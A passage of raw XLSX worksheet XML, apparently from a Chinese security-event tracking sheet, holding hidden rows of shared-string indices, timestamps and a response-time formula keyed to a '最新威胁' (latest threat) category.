      </c>
      <c r="Y135" s="10" t="s">
        <v>11953</v>
      </c>
      <c r="Z135" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA135" s="10"/>
      <c r="AB135" s="10"/>
      <c r="AC135" s="14">
        <v>45961.6741898148</v>
      </c>
      <c r="AD135" s="14"/>
      <c r="AE135" s="14"/>
      <c r="AF135" s="14"/>
      <c r="AG135" s="14">
        <v>45961.6741898148</v>
      </c>
      <c r="AH135" s="10" t="s">
        <v>11954</v>
      </c>
      <c r="AI135" s="10"/>
      <c r="AJ135" s="10"/>
      <c r="AK135" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL135" s="10"/>
      <c r="AM135" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN135" s="10"/>
      <c r="AO135" s="10"/>
      <c r="AP135" s="10"/>
      <c r="AQ135" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR135" s="10"/>
      <c r="AS135" s="10" t="s">
        <v>11955</v>
      </c>
      <c r="AT135" s="10"/>
      <c r="AU135" s="10"/>
      <c r="AV135" s="10" t="s">
        <v>11956</v>
      </c>
      <c r="AW135" s="10"/>
      <c r="AX135" s="14"/>
      <c r="AY135" s="1" t="e">
        <f>VLOOKUP(E135,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ135" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA135" s="9" t="str">
        <f t="shared" si="20"/>
        <v/>
      </c>
      <c r="BB135" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC135" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD135" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="136" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A136" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B136" s="2">
        <v>45967.4163773148</v>
      </c>
      <c r="C136" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D136" s="10" t="s">
        <v>11957</v>
      </c>
      <c r="E136" s="10"/>
      <c r="F136" s="10"/>
      <c r="G136" s="10"/>
      <c r="H136" s="10"/>
      <c r="I136" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J136" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K136" s="10"/>
      <c r="L136" s="10"/>
      <c r="M136" s="10"/>
      <c r="N136" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O136" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P136" s="10" t="s">
        <v>11958</v>
      </c>
      <c r="Q136" s="10"/>
      <c r="R136" s="10"/>
      <c r="S136" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T136" s="10"/>
      <c r="U136" s="10"/>
      <c r="V136" s="13" t="s">
        <v>8432</v>
      </c>
      <c r="W136" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X136" s="10"/>
      <c r="Y136" s="10" t="s">
        <v>11959</v>
      </c>
      <c r="Z136" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA136" s="10"/>
      <c r="AB136" s="10"/>
      <c r="AC136" s="14">
        <v>46002.3728009259</v>
      </c>
      <c r="AD136" s="14"/>
      <c r="AE136" s="14"/>
      <c r="AF136" s="14"/>
      <c r="AG136" s="14">
        <v>46002.3728009259</v>
      </c>
      <c r="AH136" s="10"/>
      <c r="AI136" s="10"/>
      <c r="AJ136" s="10"/>
      <c r="AK136" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL136" s="10" t="s">
        <v>11960</v>
      </c>
      <c r="AM136" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN136" s="10"/>
      <c r="AO136" s="10"/>
      <c r="AP136" s="10"/>
      <c r="AQ136" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR136" s="10"/>
      <c r="AS136" s="10" t="s">
        <v>11961</v>
      </c>
      <c r="AT136" s="10"/>
      <c r="AU136" s="10"/>
      <c r="AV136" s="10" t="s">
        <v>11962</v>
      </c>
      <c r="AW136" s="10"/>
      <c r="AX136" s="14"/>
      <c r="AY136" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ136" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA136" s="9" t="str">
        <f t="shared" si="20"/>
        <v/>
      </c>
      <c r="BB136" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC136" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD136" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="137" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A137" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B137" s="2">
        <v>45968.6041898148</v>
      </c>
      <c r="C137" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D137" s="10" t="s">
        <v>11963</v>
      </c>
      <c r="E137" s="10"/>
      <c r="F137" s="10"/>
      <c r="G137" s="10"/>
      <c r="H137" s="10"/>
      <c r="I137" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J137" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K137" s="10"/>
      <c r="L137" s="10"/>
      <c r="M137" s="10"/>
      <c r="N137" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O137" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P137" s="10" t="s">
        <v>11964</v>
      </c>
      <c r="Q137" s="10"/>
      <c r="R137" s="10"/>
      <c r="S137" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T137" s="10"/>
      <c r="U137" s="10"/>
      <c r="V137" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W137" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X137" s="10"/>
      <c r="Y137" s="10" t="s">
        <v>11965</v>
      </c>
      <c r="Z137" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA137" s="10"/>
      <c r="AB137" s="10"/>
      <c r="AC137" s="14">
        <v>46002.3728009259</v>
      </c>
      <c r="AD137" s="14"/>
      <c r="AE137" s="14"/>
      <c r="AF137" s="14"/>
      <c r="AG137" s="14">
        <v>46002.3728009259</v>
      </c>
      <c r="AH137" s="10"/>
      <c r="AI137" s="10"/>
      <c r="AJ137" s="10"/>
      <c r="AK137" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL137" s="10" t="s">
        <v>11966</v>
      </c>
      <c r="AM137" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN137" s="10"/>
      <c r="AO137" s="10"/>
      <c r="AP137" s="10"/>
      <c r="AQ137" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR137" s="10"/>
      <c r="AS137" s="10" t="s">
        <v>11961</v>
      </c>
      <c r="AT137" s="10"/>
      <c r="AU137" s="10"/>
      <c r="AV137" s="10" t="s">
        <v>11962</v>
      </c>
      <c r="AW137" s="10"/>
      <c r="AX137" s="14"/>
      <c r="AY137" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ137" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA137" s="9" t="str">
        <f t="shared" si="20"/>
        <v/>
      </c>
      <c r="BB137" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC137" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD137" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="138" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A138" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B138" s="2">
        <v>45973.3963541667</v>
      </c>
      <c r="C138" s="10" t="s">
        <v>11732</v>
      </c>
      <c r="D138" s="10" t="s">
        <v>11967</v>
      </c>
      <c r="E138" s="10"/>
      <c r="F138" s="10"/>
      <c r="G138" s="10"/>
      <c r="H138" s="10"/>
      <c r="I138" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J138" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K138" s="10"/>
      <c r="L138" s="10"/>
      <c r="M138" s="10"/>
      <c r="N138" s="10" t="s">
        <v>11734</v>
      </c>
      <c r="O138" s="17" t="s">
        <v>11624</v>
      </c>
      <c r="P138" s="10" t="s">
        <v>11968</v>
      </c>
      <c r="Q138" s="10"/>
      <c r="R138" s="10"/>
      <c r="S138" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T138" s="10"/>
      <c r="U138" s="10"/>
      <c r="V138" s="12" t="s">
        <v>8377</v>
      </c>
      <c r="W138" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X138" s="10"/>
      <c r="Y138" s="10" t="s">
        <v>11969</v>
      </c>
      <c r="Z138" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA138" s="10"/>
      <c r="AB138" s="10"/>
      <c r="AC138" s="14">
        <v>45973.4112847222</v>
      </c>
      <c r="AD138" s="10"/>
      <c r="AE138" s="10"/>
      <c r="AF138" s="14"/>
      <c r="AG138" s="14">
        <v>45973.4112847222</v>
      </c>
      <c r="AH138" s="10"/>
      <c r="AI138" s="10"/>
      <c r="AJ138" s="10"/>
      <c r="AK138" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL138" s="10"/>
      <c r="AM138" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN138" s="10"/>
      <c r="AO138" s="10"/>
      <c r="AP138" s="10"/>
      <c r="AQ138" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR138" s="10"/>
      <c r="AS138" s="14" t="s">
        <v>11970</v>
      </c>
      <c r="AT138" s="10"/>
      <c r="AU138" s="10"/>
      <c r="AV138" s="10" t="s">
        <v>11971</v>
      </c>
      <c r="AW138" s="10"/>
      <c r="AX138" s="14"/>
      <c r="AY138" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ138" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA138" s="9" t="str">
        <f t="shared" si="20"/>
        <v/>
      </c>
      <c r="BB138" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC138" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD138" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="139" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A139" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B139" s="2">
        <v>45973.6050231481</v>
      </c>
      <c r="C139" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D139" s="10" t="s">
        <v>11972</v>
      </c>
      <c r="E139" s="10"/>
      <c r="F139" s="10"/>
      <c r="G139" s="10"/>
      <c r="H139" s="10"/>
      <c r="I139" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J139" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K139" s="10"/>
      <c r="L139" s="10"/>
      <c r="M139" s="10"/>
      <c r="N139" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O139" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P139" s="10" t="s">
        <v>11973</v>
      </c>
      <c r="Q139" s="10"/>
      <c r="R139" s="10"/>
      <c r="S139" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T139" s="10"/>
      <c r="U139" s="10"/>
      <c r="V139" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W139" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X139" s="10"/>
      <c r="Y139" s="10" t="s">
        <v>11974</v>
      </c>
      <c r="Z139" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA139" s="10"/>
      <c r="AB139" s="10"/>
      <c r="AC139" s="14">
        <v>46002.3728009259</v>
      </c>
      <c r="AD139" s="14"/>
      <c r="AE139" s="14"/>
      <c r="AF139" s="14"/>
      <c r="AG139" s="14">
        <v>46002.3728009259</v>
      </c>
      <c r="AH139" s="10"/>
      <c r="AI139" s="10"/>
      <c r="AJ139" s="10"/>
      <c r="AK139" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL139" s="10" t="s">
        <v>11975</v>
      </c>
      <c r="AM139" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN139" s="10"/>
      <c r="AO139" s="10"/>
      <c r="AP139" s="10"/>
      <c r="AQ139" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR139" s="10"/>
      <c r="AS139" s="10" t="s">
        <v>11961</v>
      </c>
      <c r="AT139" s="10"/>
      <c r="AU139" s="10"/>
      <c r="AV139" s="10" t="s">
        <v>11962</v>
      </c>
      <c r="AW139" s="10"/>
      <c r="AX139" s="14"/>
      <c r="AY139" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ139" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA139" s="9" t="str">
        <f t="shared" si="20"/>
        <v/>
      </c>
      <c r="BB139" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC139" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD139" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="140" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A140" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B140" s="2">
        <v>45974.4089583333</v>
      </c>
      <c r="C140" s="10" t="s">
        <v>11721</v>
      </c>
      <c r="D140" s="10" t="s">
        <v>11976</v>
      </c>
      <c r="E140" s="10"/>
      <c r="F140" s="10"/>
      <c r="G140" s="10"/>
      <c r="H140" s="10"/>
      <c r="I140" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J140" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K140" s="10"/>
      <c r="L140" s="10"/>
      <c r="M140" s="10"/>
      <c r="N140" s="10" t="s">
        <v>11723</v>
      </c>
      <c r="O140" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P140" s="10" t="s">
        <v>11977</v>
      </c>
      <c r="Q140" s="10"/>
      <c r="R140" s="10"/>
      <c r="S140" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T140" s="10"/>
      <c r="U140" s="10"/>
      <c r="V140" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W140" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X140" s="10"/>
      <c r="Y140" s="10" t="s">
        <v>11978</v>
      </c>
      <c r="Z140" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA140" s="10"/>
      <c r="AB140" s="10"/>
      <c r="AC140" s="14">
        <v>45974.4228587963</v>
      </c>
      <c r="AD140" s="14"/>
      <c r="AE140" s="14"/>
      <c r="AF140" s="14"/>
      <c r="AG140" s="14">
        <v>45974.4228587963</v>
      </c>
      <c r="AH140" s="10"/>
      <c r="AI140" s="10"/>
      <c r="AJ140" s="10"/>
      <c r="AK140" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL140" s="10"/>
      <c r="AM140" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN140" s="10"/>
      <c r="AO140" s="10"/>
      <c r="AP140" s="10"/>
      <c r="AQ140" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR140" s="10"/>
      <c r="AS140" s="10" t="s">
        <v>11979</v>
      </c>
      <c r="AT140" s="10"/>
      <c r="AU140" s="10"/>
      <c r="AV140" s="10" t="s">
        <v>11980</v>
      </c>
      <c r="AW140" s="10"/>
      <c r="AX140" s="14"/>
      <c r="AY140" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ140" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA140" s="9" t="str">
        <f t="shared" si="20"/>
        <v/>
      </c>
      <c r="BB140" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC140" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD140" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="141" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A141" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B141" s="2">
        <v>45975.4086226852</v>
      </c>
      <c r="C141" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D141" s="10" t="s">
        <v>11981</v>
      </c>
      <c r="E141" s="10"/>
      <c r="F141" s="10"/>
      <c r="G141" s="10"/>
      <c r="H141" s="10"/>
      <c r="I141" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J141" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K141" s="10"/>
      <c r="L141" s="10"/>
      <c r="M141" s="10"/>
      <c r="N141" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O141" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P141" s="10" t="s">
        <v>11982</v>
      </c>
      <c r="Q141" s="10"/>
      <c r="R141" s="10"/>
      <c r="S141" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T141" s="10"/>
      <c r="U141" s="10"/>
      <c r="V141" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W141" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X141" s="10"/>
      <c r="Y141" s="10" t="s">
        <v>11983</v>
      </c>
      <c r="Z141" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA141" s="10"/>
      <c r="AB141" s="10"/>
      <c r="AC141" s="14">
        <v>46002.3729976852</v>
      </c>
      <c r="AD141" s="14"/>
      <c r="AE141" s="14"/>
      <c r="AF141" s="14"/>
      <c r="AG141" s="14">
        <v>46002.3729976852</v>
      </c>
      <c r="AH141" s="10"/>
      <c r="AI141" s="10"/>
      <c r="AJ141" s="10"/>
      <c r="AK141" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL141" s="10" t="s">
        <v>11984</v>
      </c>
      <c r="AM141" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN141" s="10"/>
      <c r="AO141" s="10"/>
      <c r="AP141" s="10"/>
      <c r="AQ141" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR141" s="10"/>
      <c r="AS141" s="10" t="s">
        <v>11985</v>
      </c>
      <c r="AT141" s="10"/>
      <c r="AU141" s="10"/>
      <c r="AV141" s="10" t="s">
        <v>11986</v>
      </c>
      <c r="AW141" s="10"/>
      <c r="AX141" s="14"/>
      <c r="AY141" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ141" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA141" s="9" t="str">
        <f t="shared" ref="BA141:BA172" si="25">IF(A141&lt;&gt;"最新威胁",IF(ISBLANK(AX141),IF(ISBLANK(AE141),ROUND((AC141-B141)*24*60,2),ROUND((AE141-B141)*24*60,2)),ROUND((AX141-B141)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BB141" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC141" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD141" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="142" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A142" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B142" s="2">
        <v>45975.6168287037</v>
      </c>
      <c r="C142" s="10" t="s">
        <v>11629</v>
      </c>
      <c r="D142" s="10" t="s">
        <v>11987</v>
      </c>
      <c r="E142" s="10"/>
      <c r="F142" s="10"/>
      <c r="G142" s="10"/>
      <c r="H142" s="10"/>
      <c r="I142" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J142" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K142" s="10"/>
      <c r="L142" s="10"/>
      <c r="M142" s="10"/>
      <c r="N142" s="10" t="s">
        <v>11631</v>
      </c>
      <c r="O142" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P142" s="10" t="s">
        <v>11988</v>
      </c>
      <c r="Q142" s="10"/>
      <c r="R142" s="10"/>
      <c r="S142" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T142" s="10"/>
      <c r="U142" s="10"/>
      <c r="V142" s="13" t="s">
        <v>11822</v>
      </c>
      <c r="W142" s="10"/>
      <c r="X142" s="10" t="s">
        <v>11989</v>
      </c>
      <c r="Y142" s="10" t="s">
        <v>11990</v>
      </c>
      <c r="Z142" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA142" s="10"/>
      <c r="AB142" s="10"/>
      <c r="AC142" s="14">
        <v>45975.6406597222</v>
      </c>
      <c r="AD142" s="14"/>
      <c r="AE142" s="14"/>
      <c r="AF142" s="14"/>
      <c r="AG142" s="14">
        <v>45975.6406597222</v>
      </c>
      <c r="AH142" s="10" t="s">
        <v>11991</v>
      </c>
      <c r="AI142" s="10"/>
      <c r="AJ142" s="10"/>
      <c r="AK142" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL142" s="10"/>
      <c r="AM142" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN142" s="10"/>
      <c r="AO142" s="10"/>
      <c r="AP142" s="10"/>
      <c r="AQ142" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR142" s="10"/>
      <c r="AS142" s="10" t="s">
        <v>11992</v>
      </c>
      <c r="AT142" s="10"/>
      <c r="AU142" s="10"/>
      <c r="AV142" s="10" t="s">
        <v>11993</v>
      </c>
      <c r="AW142" s="10"/>
      <c r="AX142" s="14"/>
      <c r="AY142" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ142" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA142" s="9" t="str">
        <f t="shared" si="25"/>
        <v/>
      </c>
      <c r="BB142" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC142" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD142" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="143" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A143" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B143" s="2">
        <v>45979.3978472222</v>
      </c>
      <c r="C143" s="10" t="s">
        <v>11629</v>
      </c>
      <c r="D143" s="10" t="s">
        <v>11994</v>
      </c>
      <c r="E143" s="10"/>
      <c r="F143" s="10"/>
      <c r="G143" s="10"/>
      <c r="H143" s="10"/>
      <c r="I143" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J143" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K143" s="10"/>
      <c r="L143" s="10"/>
      <c r="M143" s="10"/>
      <c r="N143" s="10" t="s">
        <v>11631</v>
      </c>
      <c r="O143" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P143" s="10" t="s">
        <v>11995</v>
      </c>
      <c r="Q143" s="10"/>
      <c r="R143" s="10"/>
      <c r="S143" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T143" s="10"/>
      <c r="U143" s="10"/>
      <c r="V143" s="17" t="s">
        <v>8432</v>
      </c>
      <c r="W143" s="10"/>
      <c r="X143" s="10" t="s">
        <v>11996</v>
      </c>
      <c r="Y143" s="10" t="s">
        <v>11997</v>
      </c>
      <c r="Z143" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA143" s="10"/>
      <c r="AB143" s="10"/>
      <c r="AC143" s="14">
        <v>45979.4179398148</v>
      </c>
      <c r="AD143" s="14"/>
      <c r="AE143" s="14"/>
      <c r="AF143" s="14"/>
      <c r="AG143" s="14">
        <v>45979.4179398148</v>
      </c>
      <c r="AH143" s="10" t="s">
        <v>11998</v>
      </c>
      <c r="AI143" s="10"/>
      <c r="AJ143" s="10"/>
      <c r="AK143" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL143" s="10"/>
      <c r="AM143" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN143" s="10"/>
      <c r="AO143" s="10"/>
      <c r="AP143" s="10"/>
      <c r="AQ143" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR143" s="10"/>
      <c r="AS143" s="10" t="s">
        <v>11999</v>
      </c>
      <c r="AT143" s="10"/>
      <c r="AU143" s="10"/>
      <c r="AV143" s="10" t="s">
        <v>12000</v>
      </c>
      <c r="AW143" s="10"/>
      <c r="AX143" s="14"/>
      <c r="AY143" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ143" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA143" s="9" t="str">
        <f t="shared" si="25"/>
        <v/>
      </c>
      <c r="BB143" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC143" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD143" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="144" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A144" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B144" s="2">
        <v>45980.5966666667</v>
      </c>
      <c r="C144" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D144" s="10" t="s">
        <v>12001</v>
      </c>
      <c r="E144" s="10"/>
      <c r="F144" s="10"/>
      <c r="G144" s="10"/>
      <c r="H144" s="10"/>
      <c r="I144" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J144" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K144" s="10"/>
      <c r="L144" s="10"/>
      <c r="M144" s="10"/>
      <c r="N144" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O144" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P144" s="10" t="s">
        <v>12002</v>
      </c>
      <c r="Q144" s="10"/>
      <c r="R144" s="10"/>
      <c r="S144" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T144" s="10"/>
      <c r="U144" s="10"/>
      <c r="V144" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W144" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X144" s="10"/>
      <c r="Y144" s="10" t="s">
        <v>12003</v>
      </c>
      <c r="Z144" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA144" s="10"/>
      <c r="AB144" s="10"/>
      <c r="AC144" s="14">
        <v>46002.3729976852</v>
      </c>
      <c r="AD144" s="14"/>
      <c r="AE144" s="14"/>
      <c r="AF144" s="14"/>
      <c r="AG144" s="14">
        <v>46002.3729976852</v>
      </c>
      <c r="AH144" s="10"/>
      <c r="AI144" s="10"/>
      <c r="AJ144" s="10"/>
      <c r="AK144" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL144" s="10" t="s">
        <v>12004</v>
      </c>
      <c r="AM144" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN144" s="10"/>
      <c r="AO144" s="10"/>
      <c r="AP144" s="10"/>
      <c r="AQ144" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR144" s="10"/>
      <c r="AS144" s="10" t="s">
        <v>11985</v>
      </c>
      <c r="AT144" s="10"/>
      <c r="AU144" s="10"/>
      <c r="AV144" s="10" t="s">
        <v>11986</v>
      </c>
      <c r="AW144" s="10"/>
      <c r="AX144" s="14"/>
      <c r="AY144" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ144" s="9" t="str">
        <f t="shared" si="21"/>
        <v/>
      </c>
      <c r="BA144" s="9" t="str">
        <f t="shared" si="25"/>
        <v/>
      </c>
      <c r="BB144" s="9" t="str">
        <f t="shared" si="22"/>
        <v/>
      </c>
      <c r="BC144" s="9" t="str">
        <f t="shared" si="23"/>
        <v/>
      </c>
      <c r="BD144" s="9" t="str">
        <f t="shared" si="24"/>
        <v/>
      </c>
    </row>
    <row r="145" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A145" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B145" s="2">
        <v>45982.4315972222</v>
      </c>
      <c r="C145" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D145" s="10" t="s">
        <v>12005</v>
      </c>
      <c r="E145" s="10"/>
      <c r="F145" s="10"/>
      <c r="G145" s="10"/>
      <c r="H145" s="10"/>
      <c r="I145" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J145" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K145" s="10"/>
      <c r="L145" s="10"/>
      <c r="M145" s="10"/>
      <c r="N145" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O145" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P145" s="10" t="s">
        <v>12006</v>
      </c>
      <c r="Q145" s="10"/>
      <c r="R145" s="10"/>
      <c r="S145" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T145" s="10"/>
      <c r="U145" s="10"/>
      <c r="V145" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W145" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X145" s="10"/>
      <c r="Y145" s="10" t="s">
        <v>12007</v>
      </c>
      <c r="Z145" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA145" s="10"/>
      <c r="AB145" s="10"/>
      <c r="AC145" s="14">
        <v>46002.3732407407</v>
      </c>
      <c r="AD145" s="14"/>
      <c r="AE145" s="14"/>
      <c r="AF145" s="14"/>
      <c r="AG145" s="14">
        <v>46002.3732407407</v>
      </c>
      <c r="AH145" s="10"/>
      <c r="AI145" s="10"/>
      <c r="AJ145" s="10"/>
      <c r="AK145" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL145" s="10" t="s">
        <v>12008</v>
      </c>
      <c r="AM145" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN145" s="10"/>
      <c r="AO145" s="10"/>
      <c r="AP145" s="10"/>
